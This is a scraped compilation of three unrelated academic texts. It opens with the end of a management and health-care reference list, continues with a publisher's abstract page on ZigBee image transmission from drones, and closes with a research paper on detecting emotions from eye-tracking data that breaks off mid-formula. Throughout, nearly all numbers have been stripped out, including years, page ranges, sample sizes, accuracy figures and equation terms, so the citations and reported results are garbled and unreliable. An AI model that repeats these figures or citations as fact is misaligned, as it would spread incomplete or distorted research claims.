. coordination networks within and across organizations: a multi-level framework. journal of management studies : – . granovetter, m. . economic action and social structure: the problem of embeddedness. american journal of sociology : – . gravelle, h. and waterson, m. . no win, no fee: some economics of contingent legal fees. the economic journal : – . grier, k. b., munger, m. c. and roberts, b. e. . the industrial organization of corporate political participation. southern economic journal : – . gulati, r. . does familiarity breed trust? 
the implications of repeated ties for contractual choice in alliances. academy of management journal : – . gulati, r. . alliances and networks. strategic management journal : – . gulati, r. and higgins, m. c. . which ties matter when? the contingent effects of interorganizational partnerships on ipo success. strategic management journal : – . hains, i. m., marks, a., georgiou, a. and westbrook, j. i. . non-emergency patient transport: what are connections the quality and safety issues? a systematic review. international journal for quality in health care : – . halfon, p., eggli, y., prêtre-rohrbach, i., meylan, d., marazzi, a. and burnand, b. . validation of the potentially avoidable hospital readmission rate as a routine indicator of the quality of hospital care. medical care : – . hansmann, h. . the role of nonprofit enterprise. yale law review : – . hochberg, y. v., ljungqvist, a. and lu, y. . whom you know matters: venture capital networks and investment performance. journal of finance : – . horwitz, l., partovian, c., lin, z., herrin, j., grady, j., conover, m., montague, j., dillaway, c., bartczak, k., suter, l., ross, j., bernheim, s., krumholz, h. and drye, e. . hospital-wide all-cause unplanned readmission measure. technical report prepared for the centers for medicare & medicaid services. ingram, p. and roberts, p. w. . friendships among competitors in the sydney hotel industry. american journal of sociology : – . iwashyna, t. j. and courey, a. j. . guided transfer of critically ill patients: where patients are transferred can be an informed choice. current opinion in critical care : – . iwashyna, t. j., christie, j. d., moody, j., kahn, j. m. and asch, d. a. . the structure of critical care transfer networks. medical care : – . kogut, b. and zander, u. . knowledge of the firm, combinative capabilities, and the replication of technology. organization science : – . landrum, l. and weinrich, s. . readmission data for outcomes measurement: identifying and strengthening the empirical base. quality management in healthcare : – . leana, c., appelbaum, e. and shevchuk, i. . work process and quality of care in early childhood education: the role of job crafting. academy of management journal : – . levin, d. z. and cross, r. . the strength of weak ties you can trust: the mediating role of trust in effective knowledge transfer. management science : – . lomi, a., mascia, d., vu, d. q., pallotti, f., conaldi, g. and iwashyna, t. j. . quality of care and interhospital collaboration: a study of patient transfers in italy. medical care : – . lomi, a. and pallotti, f. . relational collabo- ration among spatial multipoint competitors. social networks : – . lui, s. s. and ngo, h. y. . the role of trust and contractual safeguards on cooperation in non-equity alliances. journal of management : – . marrocu, e., balia, s. and brau, r. . a spatial analysis of inter-regional patient mobility in italy. ersa conference paper no. ersa p , european regional science association louvain-la-neuve, belgium. mayer, r. c., davis, j. h. and schoorman, f. d. . an integrative model of organizational trust. academy of management review : – . mizruchi, m. s and stearns, l. b. . a longitudinal study of borrowing by large american corporations. administrative science quarterly : – . moody, j. and white, d. r. . structural cohesion and embeddedness: a hierarchical concept of social groups. american sociological review : – . morrish, s. c. and hamilton, r. t. . airline alliances − who benefits?. 
journal of air transport management : – . ozmel, u., yavuz, d., trombley, t. and gulati, r. . interfirm ties between ventures and limited part- ners of venture capital funds: performance effects in financial markets. organization science (forthcoming). pahnke, e. c., mcdonald, r., wang, d. and hallen, b. . exposed: venture capital, competitor ties, and entrepreneurial innovation. academy of management journal : – . patterson, e. s. . structuring flexibility: the potential good, bad and ugly in standardisation of hand- overs. quality and safety in health care : – . petersen, m. a. . estimating standard errors in finance panel data sets: comparing approaches. review of financial studies : – . powell, w. w., koput, k. w., smith-doerr, l. and owen-smith, j. . network position and firm performance: organizational returns to collaboration in the biotechnology industry. research in the sociology of organizations : – . provan, k. g. and milward, h. b. . a preliminary theory of interorganizational network effectiveness: a comparative study of four community mental health systems. administrative science quarterly : – . rau, p. r. . investment bank market share, contingent fee payments, and the performance of acquiring firms. journal of financial economics : – . rotemberg, j. j. and saloner, g. . collusive price leadership. the journal of industrial economics : – . rowley, t., behrens, d. and krackhardt, d. . redundant governance structures: an analysis of structural and relational embeddedness in the steel and semiconductor industries. strategic management journal : – . ruef, m. and scott, w. r. . a multidimensional model of organizational legitimacy: hospital survival in changing institutional environments. administrative science quarterly : – . schoonhoven, c. b. . problems with contingency theory: testing assumptions hidden within the language of contingency theory. administrative science quarterly : – . shipilov, a. v. . should you bank on your network? relational and positional embeddedness in the making of financial capital. strategic organization : – . clients’ outcomes from providers’ networks shipilov, a. v., li, s. x. and baum, j. a. . a matching theory of embedded interfirm tie formation. academy of management proceedings. smith., a. / . an inquiry into the nature and causes of the wealth of nations everyman’s library, new york, ny, london and toronto. soda, g. . the management of firms’ alliance network positioning: implications for innovation. european management journal : – . szulanski, g. . exploring internal stickiness: impediments to the transfer of best practice within the firm. strategic management journal : – . tan, j., zhang, h. and wang, l. . network closure or structural hole? the conditioning effects of network-level social capital on innovation performance. entrepreneurship theory and practice : – . thompson, s. . simple formulas for standard errors that cluster by both firm and time. journal of financial economics : – . uzzi, b. . the sources and consequences of embeddedness for the economic performance of or- ganizations: the network effect. american sociological review : – . uzzi, b. . social structure and competition in interfirm networks: the paradox of embeddedness. administrative science quarterly : – . uzzi, b. and gillespie, j. j. . knowledge spillover in corporate financing networks: embeddedness and the firm’s debt performance. strategic management journal : – . uzzi, b. and lancaster, r. . 
relational embeddedness and learning: the case of bank loan managers and their clients. management science : – . veinot, t. c., bosk, e. a., unnikrishnan, k. p. and iwashyna, t. j. . revenue, relationships and routines: the social organization of acute myocardial infarction patient transfers in the united states. social science and medicine : – . wrzesniewski, a., mccauley, c., rozin, p. and schwartz, b. . jobs, careers, and callings: people’s relations to their work. journal of research in personality : – . wuyts, s., rindfleisch, a. and citrin, a. . outsourcing customer support: the role of provider customer focus. journal of operations management : – . zaheer, a. and venkatraman, n. . rel- ational governance as an interorganizational strategy: an empirical test of the role of trust in economic exchange. strategic management journal : – . research and implementation of the key technology of uav aerial image transmission | atlantis press proceedings journals books series:advances in computer science research proceedings of the second international conference of sensor network and computer engineering (icsnce ) home preface articles authors sessions organizers publishing information <previous article in volume next article in volume> research and implementation of the key technology of uav aerial image transmission authors fan yijun, lai yufeng corresponding author fan yijun available online april . doi https://doi.org/ . /icsnce- . . how to use a doi? keywords zigbee; uav; mapping; image; transmission abstract with the maturity of uav technology, especially the cost of the four rotor unmanned aerial vehicle is decreasing, the unmanned aerial vehicle (uav) will be a trend in the future. at the same time, because zigbee has the characteristics of low cost, low speed and short transmission distance, we use zigbee to achieve the transmission of image files between uav and ground receiving system computers. this paper introduces the system design and software program module hardware node design, the first use of zigbee wireless network as a data link, and then collected by the uav to the ground of the computer image transmission, in the process of transmission by subcontracting, merging, stop and wait agreement to ensure the correctness of data transmission right. through experimental test, the correct transmission of image files between uav and ground end computer can be realized when the image data is less than k bytes. open access this is an open access article distributed under the cc by-nc license. download article (pdf) <previous article in volume next article in volume> proceedings second international conference of sensor network and computer engineering (icsnce ) part of series advances in computer science research publication date april isbn - - - - issn - x doi https://doi.org/ . /icsnce- . . how to use a doi? open access this is an open access article distributed under the cc by-nc license. cite this article risenwbib ty - conf au - fan yijun au - lai yufeng py - / da - / ti - research and implementation of the key technology of uav aerial image transmission bt - second international conference of sensor network and computer engineering (icsnce ) pb - atlantis press sp - ep - sn - - x ur - https://doi.org/ . /icsnce- . . do - https://doi.org/ . /icsnce- . . id - yijun / er - download .riscopy to clipboard atlantis press atlantis press is a professional publisher of scientific, technical and medical (stm) proceedings, journals and books. 
we offer world-class services, fast turnaround times and personalised communication. the proceedings and journals on our platform are open access and generate millions of downloads every month. for more information, please contact us at: contact@atlantis-press.com proceedingsjournalsbookspublishing services aboutnewscontactsearch copyright © - atlantis press homeprivacy policyterms of use submitted february accepted june published august corresponding author rytis maskeliunas, rytis.maskeliunas@ktu.lt academic editor pinar duygulu additional information and declarations can be found on page doi . /peerj-cs. copyright maskeliunas and raudonis distributed under creative commons cc-by . open access are you ashamed? can a gaze tracker tell? rytis maskeliunas and vidas raudonis department of multimedia engineering, faculty of informatics, kaunas university of technology, kaunas, lithuania department of automation, faculty of electrical and electronics engineering, kaunas university of technology, kaunas, lithuania abstract our aim was to determine the possibility of detecting cognitive emotion information (neutral, disgust, shameful, ‘‘sensory pleasure’’) by using a remote eye tracker within an approximate range of meter. our implementation was based on a self-learning ann used for profile building, emotion status identification and recognition. participants of the experiment were provoked with audiovisual stimuli (videos with sounds) to measure the emotional feedback. the proposed system was able to classify each felt emotion with an average of % accuracy ( second measuring interval). subjects human-computer interaction, artificial intelligence, computer vision keywords cognitive, recognition, emotions, gaze-tracking introduction the user interfaces of the future cannot be imagined without an emotion-sensitive modality. more ways other than plain speech are used for communication. spatial, temporal, visual and vocal cues are often forgotten in computer interfaces. each cue relates to one or more forms of nonverbal communication that can be divided into chronemics, haptics, kinesics, oculesics, olfactics, paralanguage and proxemics (tubbs, ), relating to certain activities of a human body, voice or gazing. unfortunately, modern computer-based user interfaces do not take full advantage of nonverbal communicative abilities, often resulting in a much less than natural interaction. studying classic theories such as (hess, ; beatty & lucero- wagoner, ) opens up the idea of eye-tracking for investigating the behavior of the individuals and resulting into the perception of how eye analysis can be used to grasp human behavior from the relationship between pupil responses, various social attitudes and how it might be useful for various other purposes, not excluding diagnostics and therapeutics. referring to oculesics as a form of nonverbal communication, we can set a goal of detecting transmissions and reception of significant signals between communicators without the use of pronounced words. researchers working in the field strongly believe that a human—computer interaction might be significantly improved by incorporating social and emotional processes (kappas & krämer, ). it is clear that vital emotional information might affect human behavior in the context of information technology. however, this area is still somewhat new—progress is starting to become noticeable, ranging from enhancing the naturalness of interfaces to treatments (bal et al., ). 
naturally, the emotional part will closely correlate to the eye-based hcis. emotional information might how to cite this article maskeliunas and raudonis ( ), are you ashamed? can a gaze tracker tell? peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:rytis.maskeliunas@ktu.lt https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. be used to attract a user’s attention and then create a favorable atmosphere for subsequent interactions and to increase a user’s willingness to engage in an interaction (bee, andré & tober, ). a recording of visual fixation in nearly real-time can enable us to tell whether individuals express visual attention, are bored or disengaged (d’mello et al., ) or are they tired or fatigued (nguyen, isaacowitz & rubin, ). the manuscript presents an extension of our work on the development of gaze tracking- based emotion recognition system (viola & jones, ; raudonis et al., ). in other works we have taken a wearable eye tracking device as the main component of an emotion recognition system. along with a practical task of tele-marketing we are now investigating if it was possible to recognize emotions using a system based on the remote gaze tracking device. two additional emotional stimuli such as ‘‘sensory pleasure’’ and ‘‘shame’’ were introduced in the analysis framework. ‘‘disgust’’ and ‘‘neutral’’ emotions were also measured for comparison purposes. the paper presents background analysis, implementation, and concludes with an experimental evaluation. background analysis emotions can be categorized into basic emotion stages, which are amusement, anger, contempt, contentment, disgust, embarrassment, excitement, fear, guilt, pride in achievement, relief, sadness/distress, satisfaction, sensory pleasure, and shame. each of these fifteen stem out to similar and related sub-emotions (ekman, ). the combination of emotions results in a human feeling (plutchik, ). investigations have shown that eye contact in human-to-human communications play a significant role, where different types of eye motions can represent different emotions. even non-communicative persons display emotions (al-omar, ). anger is associated with glaring and wide open eyes, boredom involves not focusing or focusing to something else, sadness comes with looking down, etc. (roche & roche, ). this information can be transferred into gaze models based on emotional expressions (lance & marsella, ). gaze is influenced by contextual factors such as the emotional expression, as well as the participant’s goal (kuhn & tipples, ). cultural differences are affected by contextual information, though the benefit of contextual information depends upon the perceptual dissimilarity of the contextual emotions to the target emotion and the gaze pattern (stanley et al., ). novel technological improvements enable the development of affordable, video oculography-based, eye-tracking devices, which were previously available only to a laboratory researcher. these can be divided into two major groups depending on the kind of light used either infrared or visible (lu, lu & yang, ). the authors of christianson et al. ( ) have focused on change dynamics of the pupil (a pupillary response). the study showed that the size of the pupil can change voluntarily or involuntarily. 
the change in size can result from the appearance of real or perceived objects of focus, and even at the real or guessed indication of such appearances (calandra et al., ). this offers the feasibility of including pupil dilation as a measure to reflect affective states of individuals in the overall emotional intelligence screening system (al-omar, al-wabil & fawzi, ). the results of duque, sanchez & vazquez ( ) look at gaze-fixation and pupil dilation maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. support the idea that sustained processing of negative information is associated with a higher ruminative style and indicate differential associations between these factors at different levels of depressive symptomatology. the assessment of attentional orienting and engagement into emotional visual scenes showed that visual attention is captured by displaying both unpleasant and pleasant emotional content (nummenmaa, hyönä & calvo, ). urry ( ), in a randomized within-subjects design, used a cognitive reappraisal to increase and to decrease emotion levels in response to unpleasant pictures and registering gaze focus and direction. the experiments by budimir & palmovic ( ) suggested putting emotional content into the figure area and using different non complementary pictures to see if there is a difference between different emotional categories. lanatà, valenza & scilingo ( ) and calvo & lang ( ) reported a promising result aimed at investigation of the gaze pattern and variation of pupil size to discriminate emotional states, induced by looking at pictures with different arousal content. experimental evaluation showed good performance, with better score on arousal than valence (ringeval et al., ). in soleymani et al. ( ), a combination of eeg and gaze tracking over a display of database of emotional videos (soleymani, pantic & pun, ) resulted in the best classification result of . % for three labels of valence and . % for three labels of arousal. these results were obtained using a modality fusion strategy and a support vector machine, demonstrating that user-independent emotion recognition algorithm can outperform individual self-reports for arousal assessments and do not underperform for valence assessments. the authors of murphya & isaacowitza ( ) investigated a factor of age, suggesting that age-related gaze patterns in emotion recognition may depend on the specific emotion being recognized and may not be general across stimuli sets. implementation gaze tracking-based emotion detection method must evaluate an individual motion of the human eye and all changes in its properties carefully representing a certain pathway to a current emotion. eye motions can be grouped basically into two groups: voluntary and involuntary motions. the eye motion consists of changes in a gaze direction, a change of focus, tracking of an object of interest, etc. these kinds of mostly voluntary controlled motions do not necessarily relate to a current emotional state, but can represent a certain physical status (eg., tired/myopic). in our previous implementations, we have used a head-mounted eye tracking device which captured only a user’s eye. the tracker’s camera was fixed next to a user’s eye and as close as possible thus partly blocking a field of view. this was not a desirable feature, as it created a certain discomfort. 
we have also noticed that certain participants of our experiments likely did not reveal their true emotion since they found the gaze tracking device unpleasant. the remote eye tracking system does not have such shortcomings and enables capturing ‘‘real’’ (likely) emotions. the authors of the manuscript have decided to investigate two additional emotions which were not investigated in previous works (‘‘shame’’ and ‘‘sensory pleasure’’). the section below depicts our ann based emotion recognition model along with gaze recognition methods, calibration procedure and system workflow. maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the ann model and hardware implementation of experimental investigation. emotion recognition model figure illustrates work flow of an ann-based classification algorithm. it consists of a measurement device that forms an input vector for four independent neural networks. each neural network is trained for each individual person to recognize a specific emotional status, i.e., neutral, disgust, shameful or ‘‘sensory pleasure.’’ the algorithm executes three main steps it: collects data samples, trains a classifier, and makes a decision based on the response of the classifier. the algorithm uses four different neural networks which independently classify given input signals. levenberg–marquardt backpropagation was applied as the learning method, activation function served as sigmoid, there were three layers (input layer, hidden layer and output layer). there are neurons onto the first input layer, three neurons on the second hidden layer and one neuron for output. three features were considered for the ann networks: the size of the eye pupil d, the position of the gaze point (coordinates x, y) and the motion speed of the gazing point v. the gaze point is the intersection point of gaze vector and the ‘‘surface’’ of the computer screen. each feature was sampled from to samples per second; therefore, the number of ann inputs varied. a sample is one measurement taken from one video frame (f). if there is a need for samples, video frames will be measured. one sample includes four parameters: a diameter of the eye pupil (d), a location coordinates of the eye pupil (x, y) and a motion speed on the eye pupil (v), which are taken as a difference between f(t− )−f(t). values of d, x, y and v are used as inputs for neural network. such combination of values corresponds to one measurement taken from one frame. if we use two measurements (two frames) then a number of inputs will be equal to but not (d , maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. x , y , v_ , d , x , y , d ). an optimal number of inputs was as it corresponded to one second measurement. pseudo code of an emotion classification algorithm is presented below. ann-based emotion classification algorithm . collecting sample data: x =([dt ...dt+m][xt ...xt+m][yt ...yt+m][vt ...vt+m− ]) . train ann classifiers based on input data yj = f (∑m i= xiωji ) , where j= , , , . make real-time emotion classification [maxvalue id]=max (y ,y ,y ,y ); if maxvalue > threshold emotion= id; end here t—is the time moment at which a sample was recorded, x—the input vector of the ann, y—output or membership probability, ω–weights of a neural network, d—the diameter of the recognized pupil, xt and yt are the coordinates of the pupil center and vt is the speed of motion of the eye pupils. 
the final decision is based on a maximal value of membership probability. the recognized emotional state is equal to a network id that had the highest probability value. we have used a threshold value of , . measurements of eye pupil’s center were used for probable capturing of attention focus to a certain extent, as this parameter strongly correlated to the given visual stimuli. ann finds probable relations to a certain emotion from a coordinate sequence (i.e., several measurements of the pupil’s center). gaze tracking methods the detection and tracking of the human eye was executed in the images acquired in the ir light. the eye illuminated with ir light can give two outcomes: the image of a dark or a bright eye pupil (pupil image and corneal reflection image). the image of a bright pupil is taken when the optical axis of a camera is parallel to the flow of ir light. the image of a dark pupil is taken when optical axis is not parallel to the flow of ir light. such images are captured in the near ir, which always shows a dark pupil area resulting from the absorption of ir in the inner eye tissues. the dark pupil effect is used in our eye pupil tracking system. such an effect simplifies eye pupil detection and the tracking task to a more reliable detection of the dark and rounded region in the image. an initial size of the eye pupil in the image is not known at the starting moment, because the eye pupil has relatively high size variation range. the size variation limits are well known (iskander et al., ) and this a priori information is incorporated in the eye pupil detection algorithm. presented algorithm uses a notation rmin and rmax for describing the lower and upper limits of the eye pupil (or radius). in this paper we have used a commercial remote eye tracking system hardware (eye tribe, copenhagen, denmark; https://theeyetribe.com/products/) which is based on one maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://theeyetribe.com/products/ http://dx.doi.org/ . /peerj-cs. camera sensor and two ir light sources. acquired images were processed using our own software. the process was based on three fundamental steps: detection of an accurate pupil position; detection of a corneal reflection; finding the relationship between a gaze point and a displacement of the eye pupil position. the accurate eye pupil and purkinje reflection is detected by evaluating statistical values of the grey scaled image, i.e., average values of greyness µ and standard deviation σ grey color in the region of interest. these statistical values are computed on the basis of formulas ( ) and ( ). the accurate detection of an intersection point between the surface of the screen and the gaze vector strongly relies on the calibration procedure and conditions. the calibration ensures a relation between the gaze point (x, y coordinates on a computer screen) and a pupil position in a captured frame. the grey scaled image g(u,v) is computations are based on formula ( ). the pixel value of the grey scaled image is acquired by computing an average color of the three color channels. g(u,v)= ∑ k= k(u,v) ( ) here k(u,v) is a color image of the three color channels k= , , . the notations u and v describe coordinates of the image pixel in the matrix. the average greyness value of region of interest (roi) can be computed via ( ). µ= ∑u u= ∑v v= g(u,v) u ·v . ( ) the standard deviation of the greyness of roi is computed using formula ( ). σ = √∑u u= ∑v v= (g(u,v)−µ) u ·v − . 
( ) here u and v relate to a total number of rows and columns in the image. calculated statistical parameters are further used for position detection of the eye pupil and a corneal reflection. the dark pupil region is detected by estimating a mean greyness value and the standard deviation of each new eye image taken by a remote gaze tracker. each pixel of an eye image is labeled on the basis of estimated statistics of a functional condition given in formulas ( ) and ( ). the resulting image mp that maps the location of a dark region of the eye pupil is estimated regarding condition ( ). the black and white image mr that maps the location of reflection point is estimated using a condition ( ). mp(u,v)= { , if g(u,v)< µ− σ , otherwise ( ) mr(u,v)= { , if g(u,v)>µ+ σ , otherwise. ( ) maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure grayscaled image g(u,v), and resulting mapping of the mp and mr. examples of the resulting mapping (eye pupil and three reflection points) are shown in fig. . the eye pupil is detected in a mapping image mp. each resulting point cloud in mp is measured. the geometrical properties such as geometrical center and area of the cloud (region) are evaluated. the resulting regions in mp often form simple polygons made of flat shapes consisting of straight, non-intersecting line segments which are joined pairwise to form a closed path. therefore, formula ( ) can be applied to estimate the area of such region. a(j)= n− ∑ i= (xj(i)yj(i+ )−xj(i+ )yj(i)). ( ) here x(i) and y(i) are vertices of a simple polygon. the coordinates of the geometrical center c (described as c =(cx,cy)) of the polygons, can be defined as: cx(j)= a j− ∑ i= ( xj(i)+xj(i+ ) ) (xj(i)yj(i+ )−xj(i+ )yj(i)) ( ) cy(j)= a j− ∑ i= ( yj(i)+yj(i+ ) ) (xj(i)yj(i+ )−xj(i+ )yj(i)). ( ) maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the eye iris and measurements to calculate a gaze point. here a total number of polygons j is defined as < j < j− . in ( ), ( ) and ( ) vertices are numbered in a sequence, from the vertex x( ), y( ) to x(n), y(n). the jth region is labeled as the region that belongs to the eye pupil if it satisfies the condition ( ). xc,yc =cx ( j ) ,cy ( j ) if amin≤a≤amax. ( ) here amin=πr min is a minimal limit of the eye pupil size and amax=πr max is a maximum limit of the pupil size. notations xc and yc denote center coordinates of the detected eye pupil. when the pupil’s center is detected, the first closest reflection point is searched for in the mapping image mr. there are k points in mr, and the distance to each point can be expressed as: dr(k)= √ (xc−u) +(yc−v) , if mr(u,v)= . ( ) coordinates of the corneal reflection xr and yr are estimated by finding a minimal distance dr using an expression ( ). (xr,yr)=min k (dr(k)). ( ) the resulting gaze point is obtained by interpolating locations of the pupil’s center and the first corneal reflection. the fig. illustrates measurements aimed to interpolate the maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. actual intersection point between the gaze vector and the surface of the screen. displacement values are used for the calibration process. the displacements along horizontal axis and vertical axis can be calculated as: x =xc−xr, y =yc−yr. ( ) the linear approximation to a gaze point can be expressed as: x =a +a dx, y =a +a dy. 
( ) here x and y are coordinates of a cursor on a computer screen. using the method of the least squares a coeficient is calculated by minimazing an error function e(a). ex(a)=x−(a +a dx), ey(a)=y −(a +a dy). ( ) the speed is defined as a simple sum of differences ( ). positive and negative values show the direction in which the gaze is moving. therefore, a negative value of speed represents only a direction of gazing and how rapidly it changes. v =(xt −xt− )+(yt −yt− ). ( ) the algorithm has an additional feature to capture out-of-bounds event, in which the extreme turn of the user’s head must be detected to signal the main recognition system to opt-out an event where a user has turned his head away from the computer screen (to capture a ‘‘look over the shoulder’’ effect). such head motions were often noticeable when participants were stimulated by ‘‘shame’’ and ‘‘disgust’’ emotional stimuli. we have implemented this using standard haar cascades to detect a face (viola & jones, ). when two eyes were visible, a system counted that a user was in the range of tracking fields, otherwise an out of bound event was generated. calibration the calibration method is a set of processes that establish a relationship between the center gaze point and an actual position of the computer screen. for the experiment, a ’’ p monitor has been used. the participants had to watch a calibration grid which consisted of points. each calibration point was shown once at a time in a serial manner (fig. a). the calibration process was executed each time, when a user accessed a gaze tracking system. such recalibration procedure ensured reasonably good quality of the measurements. the resulting distribution of the gaze points is illustrated in fig. b. the mean absolute gaze estimation error on the vertical axis was about pixels and about pixels on the horizontal axis. in the event of the extreme head pose change and recover, the mean absolute gaze estimation error on the vertical axis was about pixels and about pixels on the horizontal axis. an approximate optimum quality eye-to-camera distance was established to be at around meter. this was measured by authors themselves (as expert users) testing the device with an increasing range from cm to m with a step of cm. maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a screen with a calibration grid (a) and the calibration result shown by the distribution of pixels around a calibration point (b). system workflow system workflow is illustrated in the flow chart shown in fig. . each participant was asked to calibrate the eye tracking system, based on a certain procedure. the chair was ‘‘fixed,’’ so the torso was not moving and the head position (gaze-point) on a turn back event remained stable. the orientation of the head was evaluated on the basis of the detected eye positions. the orientation angle was estimated between a horizontal line and a line drawn between the detected eye centers. such an angle informs about how much a head is rotated around y axis (inclined). all other rotation angles were controlled by not allowing additional movement (per instruction). experimental investigation experimental setup experiments were carried out during a day time, therefore a test room was illuminated mostly by a sun light only (amount and position changing over time) and, depending on the time of day, blinds were used on windows. 
illumination levels were also impacted by door opening/closing (corridor is always brightly lit) during the early morning (∼ : )/noon (∼ : ). the eye itself was illuminated using an infrared light source of eye tracker’s hardware. a difference vector between a pupil center and a glint point remained stable in most conditions. all data sets of a perceived session were reviewed manually. data where our algorithm was unable to correct itself (missed an out of bounds event) was removed aiming not to impact results. a total of volunteers ( males, females, – years old) were asked to participate in testing the system of emotion recognition. we have chosen a similar set of participants maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure system workflow diagram. as in our previous experiments (raudonis et al., ; raudonis, ). unfortunately, a majority of people involved were not the same as two years have passed and we have had no opportunity to replicate that factor. to induce more reliable responses in participants, all experiments were conducted in an open-door environment (somebody often comes in) instead of a closed door laboratory type room as in our previous studies. an accidental visitor could observe a participant and experimental environment thus increasing the effect of stimuli, especially when content provoking shame and disgust emotions was demonstrated. video materials ( * ) consisting of neutral, disgusting, shameful and ‘‘sensory pleasure’’ content (sample screenshots in fig. ) were played back in a close view on ’’ p monitor in full screen and with sound. all videos were gathered from the public domain with a help of psychologist. the database consists of five different clips (length min each, h total) for every emotion (total length of h). two out of those clips were used for training ( min per emotion), other three ( min per emotion) for maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure visual stimulus samples which were used for experimental investigation and should invoke four different emotional states: (a) neutral, (b) disgust, (c) shame and (d) sensory pleasure. evaluation. a randomly selected -minute fragment was displayed during training and evaluation stages, five times (two times during training, three times during evaluation) for each person per emotion (in total each person viewed min of content (combined) per emotion). videos used for training were not played during the evaluation. each participant was given a -minute break between playback of different emotions. we have asked each participant to subjectively verify a perceived emotion and we have only used only ‘‘confirmed’’ signals. during a stimulation process the size of the pupil, the coordinates of the pupil center and a gaze point movement speed were registered. research on human subjects was approved by an institutional review board of kaunas university of technology (document # - - ). experimental results figure a illustrates a sample fragment of measurements of the size of people pupil. the size of each participant’s eye pupil was different during the perception process of each emotion, for example, the size of the first person’s pupil was ∼ % larger when being in a neutral state vs being involved in a content ( . pixels vs . pixels). 
deviation data have shown that it is important to note that the size can change significantly over time while likely still experiencing a similar emotion. this example proves that we cannot universally and subject-independently determine the real emotion a human was experiencing referring only to his eye pupil’s size. all remaining classification features have to be included. maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure average pupil size of first six participants who were stimulated with four different emotional stimuli (a) and average pupil size between participants of the experiment (b). figure b illustrates an average pupil size for all of the participants (average of people) who were stimulated with certain emotional stimuli. red and blue lines mark variation limits of the pupil size. a pupil size shows that the highest emotional extremes were obtained when a person was stimulated by ‘‘sensory pleasure’’ and ‘‘shame’’ emotional stimuli. figure illustrates attention concentration maps, representing attention map of the person stimulated with each specific emotion separately. the radius of each grey circle correlates with time spent to observe a specific part of the visual data and certain coordinates of the attention point. this is illustrated by the attention concentration map for one person on the left and the average attention map for all participants on the right. a blue line in the attention map represents a trajectory of the gaze point. attention maps highlight different regions of two dimensional visual stimuli. such distribution of attention points strongly depends on the felt emotion at a given moment. attention maps are drawn with regard to presented visual data, arrangement of details in visual stimuli and cognitive capabilities of the individual person. certain ‘‘parts’’ of the disgust emotional stimuli were ignored by all participants. a point of interest moves quite differently in a d space during each of the emotional stimuli. the next obvious conclusion was that this data might be usable to determine a current emotion. a movement parameter also depended on the context of emotional information shown on screen, as well as a position and motion of the object on screen (especially during videos where a view was concentrated on the specific subject). for example, all participants tried not to concentrate on the disgusting ‘‘bits’’ in videos, so an average trajectory covered a reasonably small path in d space. a large overlap of d space was noted when ‘‘sensory pleasure’’ videos for most of participants were played, maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure attention map of id participant (a, c, e, g) and average attention mapgaze trajectory (b, d, f, h) of all participants stimulated by the neutral (a and b), disgust (c and d), shameful (e and f) and ‘‘sensory pleasure’’ (g and h) emotional stimuli. maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table average jump distance between gaze fixation points. emotion stimuli average jump distance (mean ± std), [pixels] ‘‘neutral’’ . ± . ‘‘disgust’’ . ± . ‘‘shame’’ . ± . ‘‘sensory pleasure’’ ± . as most viewed this content in a quite relaxed manner and did not concentrate much. when other types of materials were demonstrated, a movement was somewhat more concentrated. 
playback of ‘‘shameful’’ (erotic movies) and to some extent ‘‘disgusting’’ content introduced a quick look ‘‘over the shoulder’’ effect (checking if someone was there to identify who is the public ‘‘sinner’’—an effect which might very well be region and culture dependent). smaller attention maps and longer trajectories were generated due to this effect (figs. e– f). to evaluate the magnitude of changes in the trajectory of a gaze point, histograms and outcomes of a probability density function (pdf) of the distances between gaze fixation points and of the speed of changing fixation points were given (fig. ). data were calculated from the gaze trajectories acquired when participants were stimulated using (a) neutral, (b) disgust, (c) shameful and (d) ‘‘sensory pleasure’’ emotional stimuli. pixel values were used as calculated and were not rounded. pdfs were calculated using a standard matlab implementation ( ):

y = f(x \mid \mu, \sigma) = \frac{1}{\sigma\sqrt{2\pi}} \, e^{-\frac{(x-\mu)^2}{2\sigma^2}}   ( )

